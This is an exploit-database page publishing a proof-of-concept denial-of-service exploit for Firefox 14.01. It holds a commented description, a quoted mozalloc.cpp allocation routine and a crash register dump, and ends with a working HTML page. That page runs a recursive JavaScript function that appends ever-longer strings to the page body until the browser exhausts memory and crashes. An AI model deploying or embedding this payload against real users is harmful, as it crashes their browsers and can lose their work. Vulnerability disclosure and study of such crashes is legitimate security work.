Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit



EKU-ID: 2583 CVE: OSVDB-ID:
Author: Jean Pascal Pereira Published: 2012-08-17 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<!--

---------------------------------------------------
Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit
---------------------------------------------------

Credit: Jean Pascal Pereira <[email protected]>

Description:

Mozilla Firefox is prone to a memory exhaustion vulnerability.
The issue has been tested on Firefox 14.01, prior versions may also be affected.

mozalloc.cpp, line 184:

moz_xposix_memalign(void **ptr, size_t alignment, size_t size)
{
    int err = posix_memalign(ptr, alignment, size);
    if (UNLIKELY(err && ENOMEM == err)) {

        mozalloc_handle_oom();
        return moz_xposix_memalign(ptr, alignment, size);
    }
    // else: (0 == err) or (EINVAL == err)
    return err;
}

A crafted JavaScript leads the application to crash.

Stacktrace (Windows 7 SP1):

EAX 00000000
ECX 5D923896 MSVCR100.5D923896
EDX 00000003
EBX 7FB00000 UNICODE "xxxxxxxxx [...]"
ESP 002BB7F8
EBP 002BB85C
ESI 5D8D1EC6 MSVCR100.__p__iob
EDI 5D92379C MSVCR100.fputs
EIP 73FC1999 mozalloc.73FC1999
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(C000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 1.0000000000000000000
ST1 empty 0.1085754583206562651
ST2 empty -0.0696429635909516231
ST3 empty 86.763962149620056150
ST4 empty 31200.200000000000730
ST5 empty 1.3451474216221712500e+15
ST6 empty 1.0390856000000000000e+10
ST7 empty 0.0
               3 2 1 0      E S P U O Z D I
FST 0022  Cond 0 0 0 0  Err 0 0 1 0 0 0 1 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

-->

<html>
<head>
<title></title>
</head>
<body></body>
<script>
function e(x)
{
  document.body.innerHTML += x;
  e(x + 'x');
};

e('x')
</script>
</html>